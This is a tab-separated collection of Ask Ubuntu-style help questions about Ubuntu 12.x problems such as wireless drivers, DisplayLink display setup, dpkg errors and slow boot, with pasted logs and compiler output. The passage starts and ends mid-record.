precise-backports/main translation-en hit ca.archive.ubuntu.com precise-backports/multiverse translation-en hit ca.archive.ubuntu.com precise-backports/restricted translation-en hit ca.archive.ubuntu.com precise-backports/universe translation-en fetched 1,732 kb in 23s ( 73.2 kb/s ) reading package lists ... done richard @ richard-satellite-c650 : ~ $ note : above i had to remove the http : // from the links as the website will not let me post more then 2 links at one time . richard @ richard-satellite-c650 : ~ $ sudo apt-get install gnu-radio reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gnu-radio richard @ richard-satellite-c650 : ~ $
253589	how can i prevent ios devices from being mounted when i connect them ?	i connect my ipod and ipad to my computer to charge them . i do not want them to automatically mount on the desktop . how can i keep using my computers many usb ports for charging without being bothered by auto-mounted devices ?
253590	huawei broadband modem internet connection using wine	i have installed the huawei mobile broadband software using wine but when i connect the huawei usb modem , the wine application can not see it . what do i need to do to configure it in wine ?
253591	network card rtl8723e not accepted anymore in ubuntu	a time ago i bought a new laptop but i had a lot of problems with it . first there was the problem with ubuntu who had n't a driver for the network card . after a long search i found the solution here : wireless card realtek rtl8723ae-bt is not recognized . the solution with the dropbox link worked , but not for long . not long after that i had problems with the card in windows and ubuntu ( and i still have them sometimes ) . sometimes the card just does not work . i have looked for a solution and let people from the it-service in our school look but nobody of us could find a solution . after that , i upgraded the kernel of ubuntu , which has the next problem because the driver only supported until kernel 3.3 . but in the same article that i 've mentioned before , someone gave a second link for kernel 3.5 . but from that time , everytime i restart my computer the driver is n't working automatically . i had to enable it as an lkm with modprobe . it worked for a while , but suddenly it stopped working . it does n't work anymore to use modprobe to enable it and i 've tried restarting , reinstalling the drivers , ... i installed almost everythink i could think of and what i could find on the internet . do anyone have a solution for this ? it 's so irritating ... thanks ! edit : now working again ( for a time ... )
253593	launchpad build error - missing libgtk3	i 've just tried to upload my first ubuntu package to ppa and i got : dh_strip debug symbol extraction : disabling for ppa build dh_strip debug symbol extraction : not doing anything since no_pkg_mangle is given dh_makeshlibs dh_shlibdeps dpkg-shlibdeps : error : could n't find library libgtk-3.so.0 needed by debian/mypackage/opt/mypackage/mypackage ( elf format : 'elf32-i386 ' ; rpath : '' ) . dpkg-shlibdeps : error : could n't find library libgdk-3.so.0 needed by debian/mypackage/opt/mypackage/mypackage ( elf format : 'elf32-i386 ' ; rpath : '' ) . dpkg-shlibdeps : error : can not continue due to the errors listed above . note : libraries are not searched in other binary packages that do not have any shlibs or symbols file . to help dpkg-shlibdeps find private libraries , you might need to set ld_library_path . dh_shlibdeps : dpkg-shlibdeps -tdebian/mypackage.substvars debian/mypackage/opt/mypackage/mypackage returned exit code 2 make : *** [ binary ] error 2 dpkg-buildpackage : error : /usr/bin/fakeroot debian/rules binary gave error exit status 2 i added dependency : libgtk-3-0 ( > =3.0.0 ) , but it did n't help . thanks for any help .
253595	getting dvi to work through lenovo usb port replicator in 12.10 : instability and getting it to use xorg.conf file	setup : computer is a lenovo thinkpad sl500 using the usb port replicator running livecd for ubuntu 12.10 . computer has usb attachment to port replicator . port replicator has dvi to hdmi convertor and attaches via hdmi to sony bravia tv initial symptom : all functions of port replicator ( audio , usb ports , lan port ) work except video . in dmesg , get the following error : [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is ` < num > ` usb 2-4.1 : dvi-i-1 : edid invalid . current state : no issue getting an edid , but lots of crashes and can only get it to use displaylink screen partially even if forcing it ( more details : see edit 3 ) . current conclusion : so , after time burnt , my conclusions are : it is n't plug and play it probably could work , but i 'm still missing something it is n't very stable still would welcome any input from anyone that is going through this . first troubleshooting : troubleshooting to date : when using windows vista , external monitor works through the usb port replicator when plugging external monitor directly into the hdmi port , it works fine when plugging in a different laptop ( lenovo thinkpad x61t ) that is running ubuntu 12.10 natively , get same error . note all testing that deals with downloading packages and compiling were done with this laptop since it is running 12.10 natively . from the above : no issue with external monitor ( since it works via hdmi and through port replicator with windows ) no issue with the one computer ( same behavior on the other computer ) no issue with the video card ( since it works via hdmi and through port replicator with windows ) no issue with the port replicator ( since it works with windows ) seems to be related specifically to recognizing the dvi through usb port replicator with ubuntu . has anyone gotten video to work through the usb port replicator ? if so , what configuration is required ? this is the last thing i need to get working to convince my wife to make the switch from windows to ubuntu on her computer . i was so close ! edit1 : second troubleshooting trying to use xf86-displaylink-0.3 driver . there are many posts on this here and elsewhere . unfortunately , i get a compile error which according to some sites is due to the upgrade of xorg . has anyone come across a fix ? it seems that loading this driver may be the step i need to get past the error above and on to the next step of getting this to work . here is the error : make all-recursive make [ 1 ] : entering directory `/home/rob/xf86-video-displaylink' making all in src make [ 2 ] : entering directory `/home/rob/xf86-video-displaylink/src' /bin/bash ../libtool -- tag=cc -- mode=compile gcc -dhave_config_h -i . -i.. -fvisibility=hidden -i/usr/include/pixman-1 -i/usr/include/libdrm -i/usr/include/xorg -i/usr/include/x11/dri -g -o2 -mt displaylink.lo -md -mp -mf .deps/displaylink.tpo -c -o displaylink.lo displaylink.c libtool : compile : gcc -dhave_config_h -i . -i.. -fvisibility=hidden -i/usr/include/pixman-1 -i/usr/include/libdrm -i/usr/include/xorg -i/usr/include/x11/dri -g -o2 -mt displaylink.lo -md -mp -mf .deps/displaylink.tpo -c displaylink.c -fpic -dpic -o .libs/displaylink.o displaylink.c : in function ‘displaylinkfreerec’ : displaylink.c:165:2 : warning : ‘xfree’ is deprecated ( declared at /usr/include/xorg/os.h:234 ) [ -wdeprecated-declarations ] displaylink.c : in function ‘displaylinkprobe’ : displaylink.c:204:10 : warning : assignment discards ‘const’ qualifier from pointer target type [ enabled by default ] displaylink.c:226:28 : warning : assignment from incompatible pointer type [ enabled by default ] displaylink.c:237:2 : warning : ‘xfree’ is deprecated ( declared at /usr/include/xorg/os.h:234 ) [ -wdeprecated-declarations ] displaylink.c : in function ‘displaylinkpreinit’ : displaylink.c:285:7 : error : ‘struct _scrninforec’ has no member named ‘racmemflags’ displaylink.c:285:23 : error : ‘rac_fb’ undeclared ( first use in this function ) displaylink.c:285:23 : note : each undeclared identifier is reported only once for each function it appears in displaylink.c:285:32 : error : ‘rac_colormap’ undeclared ( first use in this function ) displaylink.c:285:47 : error : ‘rac_cursor’ undeclared ( first use in this function ) displaylink.c:285:60 : error : ‘rac_viewport’ undeclared ( first use in this function ) displaylink.c:287:7 : error : ‘struct _scrninforec’ has no member named ‘racioflags’ displaylink.c:290:2 : warning : passing argument 3 of ‘fbdevhwinit’ discards ‘const’ qualifier from pointer target type [ enabled by default ] in file included from displaylink.c:52:0 : /usr/include/xorg/fbdevhw.h:21:23 : note : expected ‘char *’ but argument is of type ‘const char *’ displaylink.c:351:2 : warning : ‘xalloc’ is deprecated ( declared at /usr/include/xorg/os.h:215 ) [ -wdeprecated-declarations ] displaylink.c : in function ‘displaylinkscreeninit’ : displaylink.c:474:2 : warning : passing argument 1 of ‘fbdevhwadjustframe’ makes pointer from integer without a cast [ enabled by default ] in file included from displaylink.c:52:0 : /usr/include/xorg/fbdevhw.h:50:23 : note : expected ‘scrninfoptr’ but argument is of type ‘int’ displaylink.c:474:2 : error : too many arguments to function ‘fbdevhwadjustframe’ in file included from displaylink.c:52:0 : /usr/include/xorg/fbdevhw.h:50:23 : note : declared here displaylink.c:554:23 : warning : assignment from incompatible pointer type [ enabled by default ] displaylink.c : in function ‘displaylinkclosescreen’ : displaylink.c:575:2 : warning : passing argument 1 of ‘pscreen- > closescreen’ makes pointer from integer without a cast [ enabled by default ] displaylink.c:575:2 : note : expected ‘screenptr’ but argument is of type ‘int’ displaylink.c:575:2 : error : too many arguments to function ‘pscreen- > closescreen’ make [ 2 ] : *** [ displaylink.lo ] error 1 make [ 2 ] : leaving directory `/home/rob/xf86-video-displaylink/src' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/rob/xf86-video-displaylink' make : *** [ all ] error 2 edit2 : third troubleshooting : i managed to get to the green screen . i needed to change the return statement of the function displaylinkclosescreen comment out the include statement for fbdevhw.h in the source code . the return statement is now : return pscreen- > closescreen ; this got the driver installed successfully . ( warning : i am not a software engineer . ) however , after creating the xorg.conf sort of file under xorg.conf.d , i am still unsuccessful in getting the displaylink monitor to function . the displaylink is recognized , but then removed ( as seen from the log ) . here is the current xorg config file , which has had several subtle variations : section `` device '' identifier `` configured video device '' driver `` intel '' busid `` pci:00:02:0 '' endsection section `` monitor '' identifier `` configured monitor '' endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' endsection # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # section `` serverlayout '' identifier `` server layout '' screen 1 `` default screen '' 0 0 screen 0 `` displaylinkscreen '' rightof `` default screen '' option `` xinerama '' `` on '' option `` clone '' `` off '' endsection # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # section `` files '' modulepath `` /usr/lib/xorg/modules '' modulepath `` /usr/local/lib/xorg/modules '' modulepath `` /usr/local/lib/xorg/modules/drivers '' endsection # # # # # # # # # # # # # # # displaylink stuff # # # # # # # # # # # # # # # section `` device '' identifier `` displaylinkdevice '' driver `` displaylink '' option `` fbdev '' `` /dev/fb1 '' option `` modevalidation '' `` noedidmodes '' endsection section `` monitor '' identifier `` displaylinkmonitor '' option `` exactmodetimingsdvi '' `` true '' horizsync 15.0 - 70.0 vertrefresh 58.0 - 62.0 modeline `` 1024x768 '' 65.00 1024 1048 1184 1344 768 771 777 806 -h sync -vsync endsection section `` screen '' identifier `` displaylinkscreen '' device `` displaylinkdevice '' monitor `` displaylinkmonitor '' subsection `` display '' depth 16 modes `` 1024x768 '' endsubsection endsection here 's the part in the xorg.0.log where it seems to my unexperienced eye to be backing out the displaylink : [ 33.383 ] ( ii ) loadmodule : `` displaylink '' [ 33.436 ] ( ii ) loading /usr/local/lib/xorg/modules/drivers/displaylink_drv.so [ 33.444 ] ( ii ) module displaylink : vendor= '' x.org foundation '' [ 33.445 ] ( ii ) dl : driver for : displaylink [ 33.445 ] ( ww ) falling back to old probe method for displaylink [ 33.484 ] ( ii ) unloadmodule : `` displaylink '' [ 33.484 ] ( ii ) unloading displaylink the following site has been helpful in getting to where i currently am : http : //mulchman.org/blog/ ? p=90 any ideas ? edit3 : fourth troubleshooting ok , after much more work and much more surfing ( there are too many folks trying this to give credit to ; unfortunately , no one that i found had a nice clean answer for 12.10 ) , i realized a few things : screen does n't have to be green . it will be green with udlfb ( which is blacklisted natively in 12.10 ) and will not show any color with udl in 12.10. do n't necessarily need to load any modules outside of 12.10 . in fact , if you do , as shown above , it causes issues in 12.10 since the api has changed for xorg 1.13 and you get lots of compile issues when attempting to modify previous modules to work in 12.10 , i ended up getting segmentation faults in xorg using the native 12.10 capabilities whether with udl or udlfb are not plug and play i can get the external monitor to work using udl or udlfb in a test setup where i force the use of the xorg.conf file by running a startx -- :2 -config < name of xorg.conf file > . however : it often leads to xorg crashes when it does n't i can only get the displaylink monitor to work and lose my laptop monitor on :2 ; also , i do not get unity on the displaylink monitor i can only get it to use the displaylink monitor with the startx command ; otherwise , it does n't see the displaylink monitor nor use it despite the presence of the same conf file in /etc/x11/xconf.d .
253599	broadcom 43228 no master mode ( and lot of errors )	i 'm trying to configure an ubuntu 12.10 based server . my motherboard is an asus p8z77-v deluxe with wifigo module onboard . i want to make it an access-point . i have fought with it for a lot of time but always got the same error : sudo iwconfig eth0 mode master error for wireless request `` set mode '' ( 8b06 ) : set failed on device eth0 ; invalid argument . in one occasion i managed to create an ad-hoc network and connect the device to it , but trying to make the device into an access point has not been possible . now i have a clean system and have only installed some packages ( listed below ) . this is the current status right now : after installing bcmwl-kernel-source and linux-headers-3.5.0-23-generic linux-libc-dev libc6-dev linux-headers-generic , wl module appears in lsmod . there is no conflicted modules like ssb , or b43 . eth0 device by sudo iwconfig eth0 gives me : ieee 802.11abgn essid : '' '' mode : managed frequency:2.412 ghz access point : not-associated bit rate:144 mb/s tx-power:24 dbm retry min limit:7 rts thr : off fragment thr : off power managementmode : all packets received link quality=5/5 signal level=0 dbm noise level=-9 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 iwlist s command successfully finds wifi networks around . maybe someone can tell me what else should i do , i 'm totally confused . added : short answer : i did n't manage to run master mode on it . i will look for another adapter . extended answer : first about broadcom-wl solution . it 's pretty easy make your adapter work as client , but tottaly impossible to run master mode . it 's described at wikidevi . about ndiswrapper i can say only one thing . it is n't support master mode . firmware-b43-installer says this card is actually not tested . please install the driver manually . after downloading and unpacking via b43-fwcutter ( described at link ) , but no results . driver is installed , lsmod shows loaded modules , but wi-fi card was unreachable .
253600	how do i move a file from one place to another in ubuntu ?	i 'm trying to create a bootable usb using an iso file , so i downloaded unetbootin but for whatever reason , unetbootin does not provide the option ( no it does n't ! ) of looking into my home folder to find the iso image . it only sees the file system . so i tried moving the iso image to the file system so the program would see it but it says i do n't have ? ? ? permission ? ? ? ? to do this ? ? wth ? ? i 'm new to ubuntu and i do n't know how to get around this . i 'm using ubuntu 12.04
253603	did my updates in 12.10 break my display driver ( nvidia )	i was so stoked , it 's been my best linux experience to date . everything was running grandly , til i let the updates do there thing , post reboot only one display worked which was labeled as laptop and the second display would not respond . i found instructions to remove and re-install , does n't work ( though it 's back to two monitors they display at 640x480 which i ca n't change ) ( that post is located here ubuntu 12.10 wo n't display properly after kernel upgrade ) sudo modprobe nvidia tells me 'fatal module not present ' i 'd rather not start from scratch again this weekend , so suggestions would be greatly appreciated .
253604	12.04 gnome shell : new window opens half screen only and does n't respond at all .	many times when i open a new window it opens only on half of the screen . can not type on it , close it or move . it 's dead . basic case : got a im message shown via shell , click to open chat on empathy window but no , can not use the window at all . so i have to open contact list and search that contact . pretty frustrating . this started only few weeks ago and i can not trace it back to some change i made . ~/.xsession-errors on empathy case http : //pastebin.com/wtzq1rwx happenes when secondary screen off . 64bit ubuntu 12.04 with gnome shell .
253611	stuck at dpkg and ca n't upgrade anymore	gaith @ ubuntu : ~ $ sudo apt-get upgrade e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . gaith @ ubuntu : ~ $ sudo dpkg -- configure -a setting up update-notifier-common ( 0.126 ) ... flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.262.orig.tar.gz after this last message flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.262.orig.tar.gzi waited for 15 minutes and nothing happened what can i do to fix this problem ? p.s : adobe.com is blocked in my country if this is related to the problem .
253617	not connecting to wep enabled wifi router after update	i have been using 12.04 on a dual boot lenovo thinkpad edge . recently the wi-fi stopped working on my home network , but still worked on an open network . other computers in the household , and my thinkpad , booted off the windows partition worked fine . examining the syslog showed that the computer was able to connect , but was disconnected during the dhcp negotiation . the wired connection works , so i logged into the router and disabled security . then the wi-fi worked fine . however , leaving the network open is not an option . examining /var/log/apt/history.log shows that recently isc-dhcp-common was updated . i suspect that the problem started there . the bottom line is that with encryption enabled in the router , i can not connect . can anyone suggest what i can do here ? halld贸r relevant bit of syslog follows . 16:27:33 networkmanager [ 807 ] : < info > ( eth1 ) : bringing up device . 16:27:33 networkmanager [ 807 ] : < info > wifi hardware radio set enabled 16:27:33 networkmanager [ 807 ] : < info > wifi now enabled by radio killswitch 16:27:33 networkmanager [ 807 ] : < info > ( eth1 ) : bringing up device . 16:27:34 networkmanager [ 807 ] : < info > ( eth1 ) : supplicant interface state : starting - > ready 16:27:34 networkmanager [ 807 ] : < info > ( eth1 ) : device state change : unavailable - > disconnected ( reason 'supplicant-available ' ) [ 20 30 42 ] 16:27:34 networkmanager [ 807 ] : < info > ( eth1 ) : supplicant interface state : ready - > inactive 16:27:34 networkmanager [ 807 ] : < warn > trying to remove a non-existant call id . 16:27:35 networkmanager [ 807 ] : < info > auto-activating connection 'chipie ' . 16:27:35 networkmanager [ 807 ] : < info > activation ( eth1 ) starting connection 'chipie' 16:27:35 networkmanager [ 807 ] : < info > ( eth1 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] 16:27:35 networkmanager [ 807 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) scheduled ... 16:27:35 networkmanager [ 807 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) started ... 16:27:35 networkmanager [ 807 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) scheduled ... 16:27:35 networkmanager [ 807 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) complete . 16:27:35 networkmanager [ 807 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) starting ... 16:27:35 networkmanager [ 807 ] : < info > ( eth1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] 16:27:35 networkmanager [ 807 ] : < info > activation ( eth1/wireless ) : connection 'chipie ' has security , and secrets exist . no new secrets needed . 16:27:35 networkmanager [ 807 ] : < info > config : added 'ssid ' value 'chipie' 16:27:35 networkmanager [ 807 ] : < info > config : added 'scan_ssid ' value '1' 16:27:35 networkmanager [ 807 ] : < info > config : added 'key_mgmt ' value 'none' 16:27:35 networkmanager [ 807 ] : < info > config : added 'wep_key0 ' value ' < omitted > ' 16:27:35 networkmanager [ 807 ] : < info > config : added 'wep_tx_keyidx ' value '0' 16:27:35 networkmanager [ 807 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) complete . 16:27:35 networkmanager [ 807 ] : < info > config : set interface ap_scan to 1 16:27:35 networkmanager [ 807 ] : < info > ( eth1 ) : supplicant interface state : inactive - > scanning 16:27:35 avahi-daemon [ 809 ] : joining mdns multicast group on interface eth1.ipv6 with address fe80 : :aed : b9ff : fee2:807d . 16:27:35 avahi-daemon [ 809 ] : new relevant interface eth1.ipv6 for mdns . 16:27:35 avahi-daemon [ 809 ] : registering new address record for fe80 : :aed : b9ff : fee2:807d on eth1.* . 16:27:36 wpa_supplicant [ 2352 ] : trying to associate with 00:1c : f0:66:23:90 ( ssid='chipie ' freq=2412 mhz ) 16:27:36 networkmanager [ 807 ] : < info > ( eth1 ) : supplicant interface state : scanning - > associating 16:27:36 wpa_supplicant [ 2352 ] : associated with 00:1c : f0:66:23:90 16:27:36 wpa_supplicant [ 2352 ] : ctrl-event-connected - connection to 00:1c : f0:66:23:90 completed ( auth ) [ id=0 id_str= ] 16:27:36 networkmanager [ 807 ] : < info > ( eth1 ) : supplicant interface state : associating - > completed 16:27:36 networkmanager [ 807 ] : < info > activation ( eth1/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'chipie ' . 16:27:36 networkmanager [ 807 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) scheduled . 16:27:36 networkmanager [ 807 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) started ... 16:27:36 networkmanager [ 807 ] : < info > ( eth1 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] 16:27:36 networkmanager [ 807 ] : < info > activation ( eth1 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) 16:27:36 networkmanager [ 807 ] : < info > dhclient started with pid 8724 16:27:36 networkmanager [ 807 ] : < info > activation ( eth1 ) beginning ip6 addrconf . 16:27:36 avahi-daemon [ 809 ] : withdrawing address record for fe80 : :aed : b9ff : fee2:807d on eth1 . 16:27:36 avahi-daemon [ 809 ] : leaving mdns multicast group on interface eth1.ipv6 with address fe80 : :aed : b9ff : fee2:807d . 16:27:36 avahi-daemon [ 809 ] : interface eth1.ipv6 no longer relevant for mdns . 16:27:36 networkmanager [ 807 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) complete . 16:27:36 dhclient : internet systems consortium dhcp client 4.1-esv-r4 16:27:36 dhclient : copyright 2004-2011 internet systems consortium . 16:27:36 dhclient : all rights reserved . 16:27:36 dhclient : for info , please visit https : //www.isc.org/software/dhcp/ 16:27:36 dhclient : 16:27:36 networkmanager [ 807 ] : < info > ( eth1 ) : dhcpv4 state changed nbi - > preinit 16:27:36 dhclient : listening on lpf/eth1/08 : ed : b9 : e2:80:7d 16:27:36 dhclient : sending on lpf/eth1/08 : ed : b9 : e2:80:7d 16:27:36 dhclient : sending on socket/fallback 16:27:36 dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 3 16:27:37 avahi-daemon [ 809 ] : joining mdns multicast group on interface eth1.ipv6 with address fe80 : :aed : b9ff : fee2:807d . 16:27:37 avahi-daemon [ 809 ] : new relevant interface eth1.ipv6 for mdns . 16:27:37 avahi-daemon [ 809 ] : registering new address record for fe80 : :aed : b9ff : fee2:807d on eth1.* . 16:27:39 dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 3 16:27:46 dhclient : last message repeated 2 times 16:27:46 kernel : [ 28901.182673 ] eth1 : no ipv6 routers present 16:27:48 dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 3 16:27:51 dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 8 16:27:56 networkmanager [ 807 ] : < info > ( eth1 ) : ip6 addrconf timed out or failed . 16:27:56 networkmanager [ 807 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... 16:27:56 networkmanager [ 807 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv6 configure timeout ) started ... 16:27:56 networkmanager [ 807 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv6 configure timeout ) complete . 16:27:59 dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 11 16:28:04 networkmanager [ 807 ] : < info > ( eth1 ) : device state change : ip-config - > unavailable ( reason 'none ' ) [ 70 20 0 ] 16:28:04 networkmanager [ 807 ] : < info > ( eth1 ) : deactivating device ( reason 'none ' ) [ 0 ] 16:28:04 networkmanager [ 807 ] : < info > ( eth1 ) : canceled dhcp transaction , dhcp client pid 8724 16:28:04 avahi-daemon [ 809 ] : withdrawing address record for fe80 : :aed : b9ff : fee2:807d on eth1 . 16:28:04 avahi-daemon [ 809 ] : leaving mdns multicast group on interface eth1.ipv6 with address fe80 : :aed : b9ff : fee2:807d . 16:28:04 avahi-daemon [ 809 ] : interface eth1.ipv6 no longer relevant for mdns . 16:28:04 networkmanager [ 807 ] : < info > policy set 'wired connection 1 ' ( eth0 ) as default for ipv4 routing and dns . 16:28:04 networkmanager [ 807 ] : < info > policy set 'wired connection 1 ' ( eth0 ) as default for ipv4 routing and dns . 16:28:04 networkmanager [ 807 ] : < info > ( eth1 ) : taking down device . i still have n't figured out how to get this right . in the meantime i can use the wifii with wep provided i use a fixed ip . i simply checked what numbers are available on the router , and pick one that is unlikely to be picked . set the dns/mask/gateway and i am all set . connect without a hitch . not a satisfactory solution , but a workaround . -- halld贸r
253618	how to modify which keys make the grub menu appear	sometime i need to access grub . i have the timeout to 0 but i can still call the grub menu by pressing esc or leaving shift pressed . what i want is to change that so for example , to get the grub menu i would need to press another key or key combination . i do not wish to change the grub menu timeout . i like it to boot fast , all i want is a way to make the key or keys to show the grub changed to another combination .
253619	shift key does not work for 12.10	installed 12.10 on samsung series 9 laptop . shift key does not work . edited /lib/udev/rules.d files that did not specify samsung model number e.g. , 95-keyboard-force-release.rules file but this did not fix the problem . have not found any problem with other keys . tried also altering keyboard layout but did not fix problem . note both shift keys not functional so not a hardware problem .
253621	how to inject or know if my wireless card is injectable	what ways or methods exist to know if a wireless card is injectable or can be injected ( packet injection ) . answers should not include recommending me to use another os that is not the official ubuntu or ubuntu direct derivatives ( like kubuntu , lubuntu or xubuntu ) .
253630	how to install packages from server cd after installing the system	i installed ubuntu server 12.04 from cd onto a machine with no internet connection . originally i did not select the samba file server task during installation , but now i want to install it . i have tried `` sudo apt-get install samba '' and `` sudo apt-get install samba4 '' but the packages can not be found . i assume the necessary packages are on the cd . do i have to explicitly mount the cd ? if so , what should i mount it as ? i have found answers to questions about upgrading packages from the internet , or installing lesser-used packages using apt-offline . but that seems unnecessarily complicated .
253632	how do i get a ralink rt3290 wireless card working ?	i just installed ubuntu 12.10 on an asus x401u , and after installation there is no list of wireless connections . i did n't have that problem with an installation on hp . what i can do to enable wifi ? 07:00.0 network controller [ 0280 ] : ralink corp. device [ 1814:3290 ]
253633	ubuntu 12.04 slow boot	i have ubuntu 12.04 and windows 7 on my samsung laptop which i bought a few months ago . boot time is satisfying until the period from the login screen to the appearance of the unity desktop and icons . i did some research and it seems that in cases like this , there is a certain culprit for the problem . i do not exactly understand what all these mean but as far as i can see hard drive is the reason for the long jump from 3 to 11 seconds . can you help me solve this ? computer specs : intel® core™ i7-3630qm cpu @ 2.40ghz 8 gb of ram 5400 rpm hdd which has 250 gb partitioned for ubuntu intel hd graphics 4000 and nvidia 650m my dmesg result is roughly as follows ( i cut the beginning due to char limit ) : [ 2.045423 ] serial : 8250/16550 driver , 32 ports , irq sharing enabled [ 2.147536 ] acpi : battery slot [ bat1 ] ( battery present ) [ 2.270765 ] linux agpgart interface v0.103 [ 2.270828 ] agpgart-intel 0000:00:00.0 : intel ivybridge chipset [ 2.270973 ] agpgart-intel 0000:00:00.0 : detected gtt size : 2097152k total , 262144k mappable [ 2.272415 ] agpgart-intel 0000:00:00.0 : detected 65536k stolen memory [ 2.272518 ] agpgart-intel 0000:00:00.0 : agp aperture is 256m @ 0xd0000000 [ 2.273562 ] brd : module loaded [ 2.274092 ] loop : module loaded [ 2.274189 ] ahci 0000:00:1f.2 : version 3.0 [ 2.274201 ] ahci 0000:00:1f.2 : pci int b - > gsi 19 ( level , low ) - > irq 19 [ 2.274262 ] ahci 0000:00:1f.2 : irq 41 for msi/msi-x [ 2.290260 ] ahci 0000:00:1f.2 : ahci 0001.0300 32 slots 6 ports 6 gbps 0x7 impl sata mode [ 2.290280 ] ahci 0000:00:1f.2 : flags : 64bit ncq pm led clo pio slum part ems apst [ 2.290285 ] ahci 0000:00:1f.2 : setting latency timer to 64 [ 2.306590 ] scsi0 : ahci [ 2.306658 ] scsi1 : ahci [ 2.306715 ] scsi2 : ahci [ 2.306772 ] scsi3 : ahci [ 2.306827 ] scsi4 : ahci [ 2.306883 ] scsi5 : ahci [ 2.307098 ] ata1 : sata max udma/133 abar m2048 @ 0xf7916000 port 0xf7916100 irq 41 [ 2.307102 ] ata2 : sata max udma/133 abar m2048 @ 0xf7916000 port 0xf7916180 irq 41 [ 2.307105 ] ata3 : sata max udma/133 abar m2048 @ 0xf7916000 port 0xf7916200 irq 41 [ 2.307107 ] ata4 : dummy [ 2.307108 ] ata5 : dummy [ 2.307109 ] ata6 : dummy [ 2.307406 ] fixed mdio bus : probed [ 2.307419 ] tun : universal tun/tap device driver , 1.6 [ 2.307421 ] tun : ( c ) 1999-2004 max krasnyansky < maxk @ qualcomm.com > [ 2.307456 ] ppp generic driver version 2.4.2 [ 2.307532 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 2.307546 ] ehci_hcd 0000:00:1a.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 2.307560 ] ehci_hcd 0000:00:1a.0 : setting latency timer to 64 [ 2.307564 ] ehci_hcd 0000:00:1a.0 : ehci host controller [ 2.307597 ] ehci_hcd 0000:00:1a.0 : new usb bus registered , assigned bus number 1 [ 2.307620 ] ehci_hcd 0000:00:1a.0 : debug port 2 [ 2.311510 ] ehci_hcd 0000:00:1a.0 : cache line size of 64 is not supported [ 2.311523 ] ehci_hcd 0000:00:1a.0 : irq 16 , io mem 0xf7918000 [ 2.326185 ] ehci_hcd 0000:00:1a.0 : usb 2.0 started , ehci 1.00 [ 2.326302 ] hub 1-0:1.0 : usb hub found [ 2.326306 ] hub 1-0:1.0 : 2 ports detected [ 2.326353 ] ehci_hcd 0000:00:1d.0 : pci int a - > gsi 23 ( level , low ) - > irq 23 [ 2.326366 ] ehci_hcd 0000:00:1d.0 : setting latency timer to 64 [ 2.326369 ] ehci_hcd 0000:00:1d.0 : ehci host controller [ 2.326401 ] ehci_hcd 0000:00:1d.0 : new usb bus registered , assigned bus number 2 [ 2.326420 ] ehci_hcd 0000:00:1d.0 : debug port 2 [ 2.330308 ] ehci_hcd 0000:00:1d.0 : cache line size of 64 is not supported [ 2.330321 ] ehci_hcd 0000:00:1d.0 : irq 23 , io mem 0xf7917000 [ 2.346154 ] ehci_hcd 0000:00:1d.0 : usb 2.0 started , ehci 1.00 [ 2.346259 ] hub 2-0:1.0 : usb hub found [ 2.346261 ] hub 2-0:1.0 : 2 ports detected [ 2.346304 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 2.346312 ] uhci_hcd : usb universal host controller interface driver [ 2.346332 ] xhci_hcd 0000:00:14.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 2.346359 ] xhci_hcd 0000:00:14.0 : setting latency timer to 64 [ 2.346363 ] xhci_hcd 0000:00:14.0 : xhci host controller [ 2.346396 ] xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 3 [ 2.346479 ] xhci_hcd 0000:00:14.0 : cache line size of 64 is not supported [ 2.346483 ] xhci_hcd 0000:00:14.0 : irq 16 , io mem 0xf7900000 [ 2.346524 ] xhci_hcd 0000:00:14.0 : irq 42 for msi/msi-x [ 2.346613 ] xhci xhci_add_endpoint called for root hub [ 2.346615 ] xhci xhci_check_bandwidth called for root hub [ 2.346633 ] hub 3-0:1.0 : usb hub found [ 2.346639 ] hub 3-0:1.0 : 4 ports detected [ 2.346681 ] xhci_hcd 0000:00:14.0 : xhci host controller [ 2.346714 ] xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 4 [ 2.346773 ] xhci xhci_add_endpoint called for root hub [ 2.346775 ] xhci xhci_check_bandwidth called for root hub [ 2.346792 ] hub 4-0:1.0 : usb hub found [ 2.346800 ] hub 